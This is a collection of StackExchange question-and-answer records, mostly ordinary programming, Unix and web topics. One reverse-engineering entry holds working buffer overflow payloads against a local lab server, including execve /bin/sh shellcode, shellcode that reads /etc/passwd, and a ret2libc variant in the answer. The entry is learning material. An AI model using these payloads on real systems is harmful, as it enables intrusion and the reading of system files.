_codereview.132195 | I'm developing a plugin for Revit (a software to make 3D buildings).The goal is simple to understand. When there is an intersection between a Wall and a Duct I create an object called Reservation at this location. I need to extract the Curve of the Ducts and the Faces of the Walls in order to calculate this intersection.My algorithm is working fine and fast with a small building (3 Ducts, 10 Walls and 8 intersections) But when I want to launch it on a real project (around 10 000 Ducts) the code is way too slow due to many ForEach loops. Here is the sample which cause the issue:foreach (Duct d in ducts) { Curve ductCurve = FindDuctCurve(d); curves.Add(ductCurve); foreach (Wall w in walls) { wallFaces = FindWallFace(w); foreach (Curve c in curves) { foreach (Face f in wallFaces) { foreach (KeyValuePair<XYZ, Wall> pair in FindInterWalls(c, f, walls)) { Reservation.Res res = new Reservation.Res(); res.RoundCenter = new XYZ(Math.Round(pair.Key.X), Math.Round(pair.Key.Y), Math.Round(pair.Key.Z)); res.WallWidth = pair.Value.Width; bool containsItemX = resList.Any(itemX => itemX.RoundCenter.DistanceTo(res.RoundCenter) < res.WallWidth + 1); if (containsItemX == false) { res.AssociatedWall = pair.Value; res.Radius = 1; res.AssociatedDuct = d; res.Center = pair.Key; resList.Add(res); model.Reservations.Add(new Reservation { ResList = resList }); } } } } } }The custom methods I'm using also contain loops. I wonder if a LINQ would be faster but I don't really know how to use it.In a nutshell i want to get all the information about Reservations without loosing so much time stuck in so many foreach loops.Here is my Reservation Class :public sealed class Reservation{ public List<Res> ResList { get; set; } public class Res { public XYZ Center { get; set; } public XYZ RoundCenter { get; set; } public Duct AssociatedDuct { get; set; } public Wall AssociatedWall { get; set; } public double WallWidth { get; set; } public int Radius { get; set; } } public Reservation() { ResList = new List<Res>(); }}A Curve is a right in the center of a Duct (each Duct contains one Curve). And a Face is a side of a Wall (each Wall contains 6 Faces) | Get every information about the Reservation | c#;performance | I hope I have understood this now.Instead of iterating over all the Duct items and adding each iteration the related Curve to curves you should create another class like public class DuctCurev{ public Duct TheDuct {get; private set; } public Curve TheCurve {get; private set; } public DuctCurve(Duct duct, Curve curve) { TheDuct = duct; TheCurve = curve; }}now we iterate once over all of the Duct's and find the related Curve which we will add to a List<DuctCurve> like so List<DuctCurve> ductCurves = new List<DuctCurve>();foreach (Duct d in ducts){ ductCurves.Add(d, FindDuctCurve(d));} then we need to adjust the remaining code to use the ductCurves and use the ! operator instead of using containsItemX == false like soforeach (Wall w in walls){ wallFaces = FindWallFace(w); foreach (DuctCurve dc in ductCurves) { foreach (Face f in wallFaces) { foreach (KeyValuePair<XYZ, Wall> pair in FindInterWalls(dc.Curve, f, walls)) { Reservation.Res res = new Reservation.Res(); res.RoundCenter = new XYZ(Math.Round(pair.Key.X), Math.Round(pair.Key.Y), Math.Round(pair.Key.Z)); res.WallWidth = pair.Value.Width; bool containsItemX = resList.Any(itemX => itemX.RoundCenter.DistanceTo(res.RoundCenter) < res.WallWidth + 1); if (!containsItemX) { res.AssociatedWall = pair.Value; res.Radius = 1; res.AssociatedDuct = dc.Duct; res.Center = pair.Key; resList.Add(res); model.Reservations.Add(new Reservation { ResList = resList }); } } } }} |
_codereview.161866 | I have written this DynamicIterable that can be used as a Lazy Iterable, where you give it a Supplier<T> of something and a number of times it can be used. This is an Iterable of T and it stores the consumed values, so when the iterator is called for a second or additional times, it does not use the Supplier again.Example: when iterating, the supplier makes HTTP requests for the next pages. This Iterable allows that and for the next times it does not make new requests and just uses a privately saved list.I really do not like the ifstatements (because they can often lead to errors, and while developing I had to figure out exactly how they should be) and I wonder if this code could be trimmed down a little more.Is this the right approach?Can I trim down most comparisons, avoiding errors because of ifs or having to change to much to introduce new functionality?Is there any part of the code where I could use one-liners? (Simple one-liners, not those with more than 3 lines for example).import java.util.ArrayList;import java.util.Iterator;import java.util.List;import java.util.NoSuchElementException;import java.util.function.Supplier;/** * Created by wgoncalves on 24-04-2017. * This is a {@link DynamicIterable<T>}, it grows when needed and saves the various items already processed, works almost like * a cache. * * For use all that is needed is a {@link Supplier<Iterable<T>>}, denominated {@link #feeder}, and an indication of how many times * is this feeder supposed to be used, {@link #MAX_FEED_COUNT}. This has a very important implication, it is implied that * this {@link #feeder} changes state for each time its {@link Supplier#get()} method is called. If this {@link Supplier<Iterable<T>>} * is always returning the same thing, the behaviour is not different, this {@link Iterable<T>} will feed of it as many * times as it is required (accordingly to {@link #MAX_FEED_COUNT}. * * After consuming every item ({@link T}) of this {@link Iterable<T>}, for subsequent consumptions the {@link #feeder} will * NOT BE USED at all. The elements are kept in a {@link List<T>}, namely {@link #finalList}, so as when the next call * to {@link #iterator()} is made, the {@link #finalList#iterator()} is used to return an {@link Iterator<T>}. * * There is the option to provide a starting set of items to be consumed, before the {@link #feeder} is used for next * items. If the method {@link #startWith(Iterable)} is used, the first elements when this {@link Iterable<T>} is consumed, * shall be the contents of the {@link Iterable<T>} passed to {@link #startWith(Iterable)} method. * * A last option is to provide a {@link Runnable} to be used as a way to do work every time {@link #feeder} is used. * To include this option there is the method {@link #updating(Runnable)}, where the given {@link Runnable} is invoked * after each feed of {@link #feeder}. */public class DynamicIterable<T> implements Iterable<T> { /** * This is the feeder, for when {@link Iterable<T>} are needed this {@link Supplier<Iterable<T>>} is used * to retrieve the next one. * If the conditions are valid this supplier will always try to retrieve next elements, even if the same elements * are being retrieved over and over again. */ private final Supplier<Iterable<T>> feeder; /** * Represents the list containing every element ever retrieved, so that when an {@link Iterator<T>} is requested for * the second time, this {@link List<T>}'s iterator is returned instead. */ private List<T> finalList = new ArrayList<>(); /** * Indicates how many times {@link #feeder} should be used for retrieving {@link Iterable<T>}. */ private final int MAX_FEED_COUNT; /** * Controls how many times {@link #feeder} has been used. */ private int feedCount = 0; /** * Allows the user of this {@link DynamicIterable<T>} to be notified every time the supplied {@link #feeder} is * used. This can be useful maybe if the state of something outside should change (most of the cases), as the other * option would be apply the change inside {@link #feeder}. This way responsibilities are separated, and this is * the recommended usage, but if desired this may not be used at all, and the changing state can be made inside * {@link #feeder}. */ private Runnable updater = () -> { }; /** * Allows controlling of the use of the {@link Iterable<T>} supplied by {@link #startWith(Iterable)} method. */ private boolean toConsumeFirst = false; /** * Current {@link Iterator<T>} in use, this will change for every {@link #feeder} usage, and for the starting * {@link Iterable<T>} if present. */ private Iterator<T> currentIterator; /** * Supplies the next {@link Iterator<T>}, changing the {@link #feedCount} (incrementing) and also * runs the {@link #updater}, for notification of a feed. */ private Supplier<Iterator<T>> nextIterator = this::getNextIterator;; public DynamicIterable(Supplier<Iterable<T>> feeder, int MAX_FEED_COUNT) { this.feeder = feeder; this.MAX_FEED_COUNT = MAX_FEED_COUNT; } @Override public Iterator<T> iterator() { if(!toConsumeFirst && feedCount >= MAX_FEED_COUNT ) // this means this method has been called previously return finalList.iterator(); // and so all elements are in finalList return new Iterator<T>() { @Override public boolean hasNext() { while(currentIterator == null || !currentIterator.hasNext()){ if(!toConsumeFirst && feedCount >= MAX_FEED_COUNT ){ // If all feeds are done, this only holds return false; // if the initial iterable has been consumed } currentIterator = nextIterator.get(); // get next iterator (whatever it may be) } return true; } @Override public T next() { if(!hasNext()) throw new NoSuchElementException(No Next Element in DynamicIterable); return addThenReturnIt(currentIterator.next()); // add to finalList and then return it } }; } private Iterator<T> getNextIterator() { ++feedCount; Iterator<T> iterator = feeder.get().iterator(); updater.run(); return iterator; } /** * Convenience method for saving an item an then returning the saved item. * Instead of creating trash local variables (technically) it still creates it. * @param t Item {@link T} to be saved and then returned. * @return The same {@link T} received. */ private T addThenReturnIt(T t){ finalList.add(t); return t; } /** * For indication of a previous {@link Iterable<T>} for which to start of. * This does not count as a feed, i.e if this set of {@link T}'s is passed and at the same time the * feed count ({@link #MAX_FEED_COUNT} is set as 0, these elements are still returned when consuming this current * {@link Iterable<T>}, just subsequent feeds are not used. * @param startIterable {@link Iterable<T>} representing the starting collection of items to start with. * @return Current {@link DynamicIterable<T>} for chaining functionality. */ public DynamicIterable<T> startWith(Iterable<T> startIterable){ toConsumeFirst = true; nextIterator = () -> { toConsumeFirst = false; nextIterator = this::getNextIterator; return startIterable.iterator(); }; return this; } /** * For allowing updates whenever a feed operation is made. * @param updater {@link Runnable} that is to be run for each feed. * @return Current {@link DynamicIterable<T>} for chaining functionality. */ public DynamicIterable<T> updating(Runnable updater){ this.updater = updater; return this; }}Here is a simple usage with Integers (the Supplier of Iterable of Integers here could be a long running operation that would benefit from laziness).import java.util.Arrays;import java.util.List;public class Main { private static List<Integer> list1, list2, list3, list4, list5; private static List<Integer>[] contents; static { list1 = Arrays.asList(10,11,12,13,14,15); list2 = Arrays.asList(20, 21,22,23,24,25,26,27,28,29,30); list3 = Arrays.asList(30,31); list4 = Arrays.asList(40,41,42); list5 = Arrays.asList(50,51,52,53); contents = new List[]{list1, list2, list3, list4, list5}; } public static void main(String[] args) throws Exception{ // You need to handle this exception System.out.println(Main App); int[] counter = new int[]{1}; DynamicIterable<Integer> dynamicIterable = new DynamicIterable<>(() -> contents[counter[0]], contents.length - 1) .startWith(contents[0]) .updating(() -> ++counter[0]); dynamicIterable.forEach(System.out::println); }} | DynamicIterable | java;object oriented;iterator;lambda | null |
_unix.382003 | From bash manual, for conditional expressionsstring1 == string2string1 = string2True if the strings are equal.When used with the [[ command, this performs pattern matching as described above (see Section 3.2.4.2 [Conditional Constructs], page 10).What does pattern matching mean here?What is pattern matching opposed to here?If not used with [[ but with other commands, what does this perform?= should be used with the test command for posix conformance.What does POSIX say here?What is the sentence opposed to?Can == be used with test command? I tried and it seems yes.Can = be used with other commands besides test? I tried = with [[ and [, and it seems yes.what are the differences between == and =?In Bash 4.3, I tried == and = with test, [[, and [. ==and = look the same to me. Can == and = be used interchangeably in any conditional expression?Thanks. | what are the differences between `==` and `=` in conditional expressions? | bash | null |
_softwareengineering.319080 | This question comes to my mind having just lost some money while ordering Pizza. Most internet merchants (atleast in India) use synchronous page redirection for integration with Banks and payment gateways. It works like this: when you visit a merchant site and checkout something it redirects you to the payment gateway passing along request as arguments in a POST or GET request, which redirects you to the bank, which redirects you to verified by Visa and then redirections all the way back. The problem is that often the redirection would fail or break due to a network error, slow connection, domain blocked by company firewall etc and the payment would get lost.Off the top of my head, such integrations would be much better handled using an asynchronous MOM provider. Example: the merchant places a payment request message signed with his private key on Bank's MOM queue and asks the user to authorize the payment with his bank. The user opens Bank's mobile app or website and sees the request in list of pending payment requests. Once authorized the Bank places a message back on Merchant's MOM queue and all is done.From my primitive google-fu it seems not many payment gateways are providing asynchronous integration.Am I missing a web design principal here or is just mass incompetence? Why don't more gateways use an asynchronous approach? | Why do most payment gateways use synchronous integration? | design;integration | The sort answer is 'history'.If you go back even just 10 years, banks only did payments at physical devices, terminals. Where you would have one terminal id per payment device. All transactions needed to supply this terminal id. Obviously, you couldn't leave the shop with your goods until you had successfully paid. Hence the synchronous nature of payments. The key thing here is a merchant can only use one terminal id at a time.Then the internet came along and merchant said why can we not just do payments online?. So, the banks said, OK, send along everything you normally would, just flagged slightly differently (so we can charge you more). This bank message includes the terminal id. Therefore internet transactions inherited the synchronous nature of card present transactions.Then add on top fraud protection devices such as 3DS and CV2AVS, and changing becomes really difficult for the poor old banks.You will find newer banks will implement asynchronous payment methods which 'may' be a better model. But then you'll be fighting with two forces. Merchants saying, why do I have to change my payment model when moving from 'old bank' to 'cool bank'. Customers saying I've bought a pizza, but I'm scared because it did something I wasn't expecting and I don't know if I paid.You cannot underestimate either of these effects. We're therefore left with majority of synchronous payment models throughout the internet.Don't jump straight on the ''incompetent'' camp, since it much easier to design how a perfect world would work when we don't have a real world to deal with.Hope this helps. |
_unix.147185 | I have a bash script. If I run this command to:grep for certain patterns, transform the output, sort the output dedupe the output then I get one grep find per line in terminalLC_ALL=C grep -o --color -h -E -C 0 -r $pattern /pathto/Pre_N/ | tr -d '[:digit:]' | sort | uniqHowever, if I put it in an output variable then the formatting is lost (upon echoing to a file or echoing on screen).#!/usr/bin/env bashoutput=$(LC_ALL=C grep -o --color -h -E -C 0 -r $pattern /pathto/Pre_N/ | tr -d '[:digit:]' | sort | uniq)echo $output > $fnHow can I preserve the formatting of the out put of this command once I save it to a variable? | Preserve formatting when command output is sent to a variable? | bash;scripting | null |
_reverseengineering.14957 | I have a server (for reference: pastebin.com/ghJX69uH) that I can netcat to and it will ask to input a message.I know it is vulnerable to buffer overflow, but I can't seem to get the shellcode to run. I have successfully pointed the return address back to the NOP slide and it hits the /bin/sh but it does not spawn a shell. Here is my code:echo `python -c 'print \x90*65517 + \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 + \xac\xf3\xfe\xbf*10 + \n'` | nc 127.0.0.1 1111It's a simple buffer overflow with [NOP SLIDE | SHELLCODE (spawn shell /bin/sh) | return address]The first image shows that the return address is 0xbffef3ac which goes to NOP sled, so all is OK! The second image shows a SIGSEGV with no shell, nothing happens. What's going on here? I had a look at ebp and it showed something weird: my \x90 followed by what should be my shellcode, but looking differently. Any insights on what could be wrong or how to go about this?0xbffef42c: 0x90909090 0x90909090 0x90909090 0x909090900xbffef43c: 0x90909090 0x90909090 0x90909090 0x909090900xbffef44c: 0x90909090 0x50c03190 0x732f2f68 0x622f68680xbffef45c: 0xe3896e69 0xbffef468 0x00000000 0x6e69622f0xbffef46c: 0x68732f2f 0x00000000 0xbffef3ac 0xbffef3ac0xbffef47c: 0xbffef3ac 0xbffef3ac 0xbffef3ac 0xbffef3ac0xbffef48c: 0xbffef3ac 0x00000000 0x00000000 0x000000000xbffef49c: 0x00000000 0x00000000 0x00000000 0x00000000Edit: Format of code is from numberphile, shellcode is from http://shell-storm.org/shellcode/files/shellcode-827.php, which I ran and spawns a shell. I tried adding padding (I put A's) between shellcode and return address, but something strange happens again:New code: echo `python -c 'print \x90*65490 + \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 + A*27 + \xac\xf4\xfe\xbf + \n'` | nc 127.0.0.1 11290xbffef42c: 0x90909090 0x90909090 0x90909090 0xc03190900xbffef43c: 0x2f2f6850 0x2f686873 0x896e6962 0x895350e30xbffef44c: 0xcd0bb0e1 0x41414180 0x41414141 0x414141410xbffef45c: 0x41414141 0x41414141 0x41414141 0x000000010xbffef46c: 0xbffef4ac 0x08049000 0x00000004 0xbffff4a40xbffef47c: 0xbffff490 0xbffff48c 0x00000004 0x000000000xbffef48c: 0x00000000 0x00000000 0x00000000 0x000000000xbffef49c: 0x00000000 0x00000000 0x00000000 0x000000000xbffef4ac: 0x00000000 0x00000000 0x00000000 0x0000000Edit: So i managed to successfully print all of the etc/passwd, but not sure why the /bin/sh shellcode doesnt workWorks: /etc/passwdecho `python -c 'print \x90*65478+\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80 +AAAA\x9c\xf3\xfe\xbf\x9c\xf3\xfe\xbf + \n'` | nc 127.0.0.1 2010Doesnt't work: /bin/shecho `python -c 'print \x90*65513 + \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 + AAAA\x9c\xf3\xfe\xbf\x9c\xf3\xfe\xbf\x9c + \n'` | nc 127.0.0.1 3003 | Buffer overflow on server | gdb;exploit;buffer overflow;shellcode | We have two major stack protection for buffer overflows:Stack canariesNon-executable stackYou land on nopsled but, you get segmentation fault. Because your operating system marked program stack as non-executable and processor raises the exception when program counter try to execute that segment. But, even we use executable stack (for GCC use -z execstack) your program crashes:I changed shellcode to read /etc/passwd, it works until another SIGSEGV. It is not relevant why your previous shellcode doesn't work, it is a practical problem.For another scenario:How can we get around non-executable stack? Most common way is ret2libc (return to libc) using system(const char *). But, we will use _exit(int) for simplicity. For our new attack, i compiled it with non-executable stack option and send same stream.$ nc localhost 1337 < exp.loitLets look our stack:We can't understand which part of your input overflows where and we need that to pass the argument(s). I tried a little to find which goes where:python -c 'print \x90*65482 + \x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80 + \x90*12 + \xac\xf3\xfe\xbf +\x00\x11\x22\x33*2 + \n' > exp.loitWe get:We just need _exit addressgdb-peda$ p &_exit$1 = (<text variable, no debug info> *) 0xb7ec6f24 <_exit>Now we are ready to execute our exploit:python -c 'print \x90*65482 + \x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80 + \x90*12 + \x24\x6f\xec\xb7 +\x01\x00\x00\x00*2 + \n' > exp.loitBasically ret2libc is that. |
_webmaster.5237 | Say I'm going to link to another site using the phrase banana split and chocolate sauce. Is my vote evenly split between banana split and chocolate sauce or is this much weaker than if I had just voted for banana split in the first place? | Roughly, how strong is a soft vote versus a hard vote for keywords? | seo | null |
_unix.73674 | I need to write a script which would execute some executables in a directory according to the last modified date. The oldest should run first. How do I do it?This is what I have done so farfor f in ./jobqueue/*; #accessing the queuedo chmod +x * # giving executable permission for the files $f # running the executablesdone | Executing a program according to the last modified date | linux;shell script;scripting;date | Provided that your filenames don't contain spaces or tabs or newlines or ? or * or [ and that the directory doesn't contain subdirectories, you might try something likefor f in $(ls -tr ./jobqueue/) ; do chmod +x ./jobqueue/$f ./jobqueue/$fdone |
_unix.300006 | I have been asked to setup an automated trigger on Unix upon receiving a certain kind of email from MS Exchange server.The requirement is to trigger a shell script when any person from a fixed list of senders sends an email via MS Exchange server to a designated email account on unix.For example:Email from [email protected] (Exchange Server) sends an email to [email protected] (Linux) with the subject: Unlock Account XThis ideally should trigger a shell script that will have code to unlock Account X.Is there a way to configure this on Unix so that upon receiving an email as described above, I can trigger a shell script? | How to trigger shell script on Unix via email from Exchange Server | shell script;email | There are multiple solutions to this problem. As suggested by Rahul in the comments, I would use procmail and edit .procmailrc to something like this::0* ^From.*[email protected]* !^FROM_DAEMON* !^FROM_MAILER* ^Subject:.*Unlock| /path/to/your/script |
_unix.139051 | I need to batch edit file creation date (some stupid audio recorder set the file creation date to UNIX epoch and the correct recording date in the modification date) to set it to the files modification date. I am aware of the touch command which can set a file creation like this touch -t 201406251546.10 filename.wav but I don't know how to retrieve each file modification date to give it as an argument to the touch command.I also know that the ls -lT command prints the modification time before each file but on my system (OS X 10.9) the output is localized which is not really handy for batch processing Any idea on how to do this? | Set file creation date to its modification date on OSX | files;osx;timestamps;touch | null |
_cogsci.12231 | I have files: left_fg+tlrc.BRIK and left_fg+tlrc.HEAD. I want to know how to convert the files to left_fg+orig.BRIK and left_fg+orig.HEAD. Thanks! | How to convert .tlrc file to .orig file? | cognitive neuroscience;fmri | null |
_unix.222503 | I created two files in /etc/systemd/network/vbr0.netdevvbr0.networkThen I reloaded systemd-networkd, however interface vbr0 is DOWNvbr0.netdev:[NetDev]Name=vbr0Kind=bridgevbr0.network:[Match]Name=vbr0[Network]DNS=8.8.8.8Address=192.168.1.1/24DHCPServer=yesip link show vbr05: vbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group defaultlink/ether d2:1a:32:c1:26:bd brd ff:ff:ff:ff:ff:ffinet 192.168.1.1/24 brd 192.168.1.255 scope global vbr0 valid_lft forever preferred_lft foreverinet6 ::ffff:192.168.1.1/0 scope global tentative valid_lft forever preferred_lft foreverStatus of systemd-networkdsystemd-networkd.service - Network Service Loaded: loaded (/lib/systemd/system/systemd-networkd.service; disabled) Active: active (running) since Tue 2015-08-11 12:55:20 CEST; 19h ago Docs: man:systemd-networkd.service(8) Main PID: 21937 (systemd-network) Status: Processing requests... CGroup: /system.slice/systemd-networkd.service 21937 /lib/systemd/systemd-networkdAug 11 12:55:20 infra systemd-networkd[21937]: veth6cce540 : gained carrierAug 11 12:55:20 infra systemd-networkd[21937]: veth839e4d9 : gained carrierAug 11 12:55:20 infra systemd-networkd[21937]: veth5dacf8a : gained carrierAug 11 12:55:20 infra systemd-networkd[21937]: vethd396754 : gained carrierAug 11 12:55:20 infra systemd-networkd[21937]: veth2ba9645 : gained carrierAug 11 12:55:20 infra systemd-networkd[21937]: docker0 : gained carrierAug 11 12:55:20 infra systemd-networkd[21937]: eth0 : gained carrierAug 11 12:55:20 infra systemd-networkd[21937]: lo : gained carrierAug 11 12:55:20 infra systemd[1]: Started Network Service.Aug 11 12:55:20 infra systemd-networkd[21937]: vbr0 : link configuredsystemd version - 215What's wrong with my config? | Can't setup private network with systemd-networkd | private network;systemd networkd | null |
_unix.165007 | I have a mutt mail client installed for receiving backup logs on my server for monitoring,Is there a way I can read the body of a mail message directly in the client in a way that I can search for a specific string or strings within it, and if found to trigger an alert mail sending?Something like a log watcher only working with mutt or some else mail client that scans every mail that arrives. | Log monitoring directly from a mail client | debian;logs;mutt | Apline and Mutt both don't work, or at least they are not needed.After a tons of research and tries the solution was to install Fetchmail as a MRA and install Procmail as a MDA, then Procmail would do the error string search because it has the egrep function built in, and supports mail forwarding based on regular exp. match.So the mail client is not needed at all, it was rather simple after a research of the two software tools man pages. |
_unix.189202 | My document doc.lst is compound with numbers and letters like this : 01 ABC and I want to take only the ABC part. I tried this, but it includes the numbers in my result.lst. sed -n -e '/[A-Z][A-Z][A-Z]/p' < doc.lst > result.lstHow to delete those numbers? | sed command doesn't return what I want | bash;sed;ksh | sed -n -e '/[A-Z][A-Z][A-Z]/p'prints the lines that match that regexp.Here, you'd want:sed -n 's/.*\([[:upper:]]\{3\}\).*/\1/p'That is, you want to substitute a sequence of any characters (as many as possible) followed by 3 uppercase letters (captured in \1 with \(...\)) followed by a sequence of any characters with the captured letters and print the result of that substitution if it matches (the p flag of the s command).Note that it will only print one set per line (the rightmost one).To print all of them, you could do:tr -cs '[:upper:]' '[\n*]' | grep -Ex '.{3}'(note that with some tr implementations, it doesn't work properly with multi-byte characters).The idea being to transliterate sequences of the complement of uppercase letters to newline characters, so that tr's output contain all sequences of uppercase characters. Then you can do an exact grep for the ones you're interested in.On an input like FOO BAR02 ABCDEF, it would print:FOOBARWhile the previous solution would print DEF. If you have GNU grep, you could use its -o option:grep -Eo '[[:upper:]]{3}'Which would print:FOOBARABCDEF |
_unix.355907 | I am thinking to use a bash code to solve the following issue in my data. Considering the bellow data set in hapmap format in which I need to replace some characters (letters in this case) based on the data of the column alleles. Data in the column alleles will be a combination in pairs of four letters (A, G, C, and T). rs# alleles chro pos ind1 ind2 ind3 ind4 ind5 ind6. . mar_1 G/T 1 2386806 G T T G K T mar_2 T/G 1 2386848 T G T K T Kmar_3 G/T 1 2387553 T K G K T Gmar_4 G/A 1 2564608 G G G N R Amar_5 C/T 1 2564616 C Y C Y T N..What I want to get is a code that go through the entire row (in the case of row 1) and when it find a letter T (letter after the /) replace it by a letter G (letter before the /) and when it find either a letter R, Y, S, W, K, or M replace it by T (letter after /). In other words the code has to find (in each row) all the letters that match with the letter after the / (in the column alleles) and replace them by a letter that match with the letter before the /. And, when it finds a letter that match with one of these: (R,Y, S, W, K, or M) it has to replace it by a letter that match with the one after the /. The output I would like to get is:rs# alleles chro pos ind1 ind2 ind3 ind4 ind5 ind6. . mar_1 G/T 1 2386806 G G G G T G mar_2 T/G 1 2386848 T T T G T Gmar_3 G/T 1 2387553 G T G T G Gmar_4 G/A 1 2564608 G G G N A Gmar_5 C/T 1 2564616 C T C T C N..Note: The N means a missing value, so it has to be kept such is it. Any help with this issue will be greatly appreciate. | Replace characters in a hapmap data set | shell script;text processing;replace;bioinformatics | With perl$ perl -F'\s+|/' -lape ' s/^(\S+\s+){4}\K.*/$&=~s|$F[2]|$F[1]|gr/e; s/^(\S+\s+){4}\K.*/$&=~s|[RYSWKM]|$F[2]|gr/e ' ip.txtrs# alleles chro pos ind1 ind2 ind3 ind4 ind5 ind6. . mar_1 G/T 1 2386806 G G G G T G mar_2 T/G 1 2386848 T T T G T Gmar_3 G/T 1 2387553 G T G T G Gmar_4 G/A 1 2564608 G G G N A Gmar_5 C/T 1 2564616 C T C T C N-F'\s+|/' split input line on white spaces or the / character, saved in @F array^(\S+\s+){4}\K.* will get all columns except the first four$&=~s|$F[2]|$F[1] on the matched portion (columns except first four) perform another substitution$F[2] will contain the character after / and $F[1] will contain the character before /The r modifier returns the final substituted string and e modifier allows to use Perl code in replacement sectionSince same pattern is used again, the second substitution can also be shortened to s//$&=~s|[RYSWKM]|$F[2]|gr/eSee command switches for explanation on -lape options |
_cs.52270 | I am looking for a formula for determining the expected number of independent sets of size $k$ (for arbitrary $k$) in a random graph $G(n,p)$. Here $n$ is the number of vertices and each edge is included with independent probability $p$. I would like to be able to calculate this for arbitrary $p$ if possible.I have come across the article [1] which provides a formula for the special case $p = 0.5$.I have also come across the article [2] which in p. 12 provides a value for some cases other than $p = 0.5$, so I would assume it is known for some $p$ values other than $0.5$. My questions are:Do you know how one shows, or could you provide a reference for the formula shown in [1] for the case $p = 0.5$. The paper gives some references but they are about clique problems and I am not sure how I could arrive from them to the result shown in that paper.Is there a known formula for arbitrary $p$?If not, for what $p$ values is a formula known and where could I find such formulas?[1] Chromatic and Independence Numbers of $G_{{n}, {{1}\over{2}}}$[1] Feo, Thomas A., Mauricio GC Resende, and Stuart H. Smith. A Greedy Randomized Adaptive Search Procedure for Maximum Independent Set. Operations Research 42, no. 5 (1994): 86078. | Expected number of independent sets of size $k$ in random graph $G(n,p)$ | graph theory;graphs;clique | The probability that a specific set of size $k$ is independent is exactly $(1-p)^{\binom{k}{2}}$ (why?). Linearity of expectation shows that the expected number of independent sets of size $k$ is $\binom{n}{k} (1-p)^{\binom{k}{2}}$ (why?).If you can't follow this calculation, please follow Denis Pankratov's advice and look up linearity of expectation and indicator random variables. |
_cs.24549 | I've seen plenty of statements in papers and on websites that Fast Fourier Transform-based multiplication algorithms are slower than other multiplication algorithms for relatively small input size N, and I've seen plenty of data in papers and on websites demonstrating that this is the case, but nothing I've come across has bothered to explain what causes FFT to be slower for small N.I would guess that the overhead is due to getting the input into a form that FFT can swallow, but I'd like to know what the actual cause of the overhead is and whether it can be reduced. Note that I'm not talking about switching from some FFT implementation to another method when N is below a certain size as many implementations do, but the source of overhead in the FFT itself and what can be done to reduce it. | What is the reason that is FFT multiplication slower than other methods for small N? | algorithms;algorithm analysis;fourier transform | The Wikipedia FFT article says that the split-radix FFT algorithm requires $4N\log_2N-6N+8$ real multiplications and additions. Multiplying 2 degree $M$ polynomials results in a polynomial of degree $2M$, so the FFT multiplication of two polynomials goes like this:FFT (size 2M) of polynomial f(x) (evaluate f(x) at the 2M primitive roots of unity)FFT (size 2M) of polynomial g(x) (evaluate g(x) at the 2M primitive roots of unity)multiply each of the 2M fourier coefficients togetherinverse FFT (size 2M) of the fourier coefficients to get the resulting polynomialPerhaps there is a way to make the first two FFTs faster based on the fact that the $M+1$th through $2M$th coefficients of f(x) and g(x) are all zeros, but I don't know it offhand.So we are doing 3 FFTs of size $2M$ plus an additional $2M$ complex multiplies (each of which is 4 real multiplies and 2 real additions so:$$3 (4(2M)\lg2M - 6(2M)+8)+4M = 24M\lg M -8M+24$$additions and $24M\lg M - 4M + 24$ multiplications.Meanwhile the naive polynomial multiplication algorithm (convolution) takes $M^2$ real multiplications and $(M-1)^2$ real additions. (Proof left as exercise for the reader.)Thus the naive algorithm will be faster for $M \leq 128$, while the FFT based algorithm will probably be faster at $M \geq 256$, and the crossover will be somewhere between 128 and 256. (Proof left as exercise for the reader.)I did this quickly and sloppily, so I'm probably off somewhere (e.g., the forward FFTs are real -> complex, (but is there a DCT version that would be cheaper?) while the reverse is complex -> real (which may have slightly different constants than the ones I used,) and I only did the evaluation at $M$ power of 2 (FFT of non-power of 2s is more expensive.)) Nonetheless, the point stands: the constant multiplier for the FFT is approximately 24, while the constant multiplier for the naive convolution is 1, so you need to compare (something like) $24M\lg M$ to $M^2$. |
_webapps.16103 | There's a rather large image in a Stack Overflow post that I'd like to replace with its thumbnail and a link to the full-size image.I know Imgur generates thumbnails for its images when you upload, but since I'm not the original uploader, is there any way for me to find the thumbnail image by URL hackery or some such? | Is it possible to find the thumbnail of an existing Imgur image? | imgur;thumbnail | I can't actually find it documented anywhere, but I uploaded an image and played with the More Sizes list:Originalhttp://i.stack.imgur.com/YdJZt.jpgI haven't included the image inline, because StackExchange would automatically scale it down. To view the original at its full size, click the link.Large thumbnailhttp://i.stack.imgur.com/YdJZtl.jpg (added an l after the image ID)Small squarehttp://i.stack.imgur.com/YdJZts.jpg (added an s after the image ID)It doesn't always handle transparency well, but small square is probably what you want.Image by digitalART2, licensed under CC-BY-2.0, available here. |
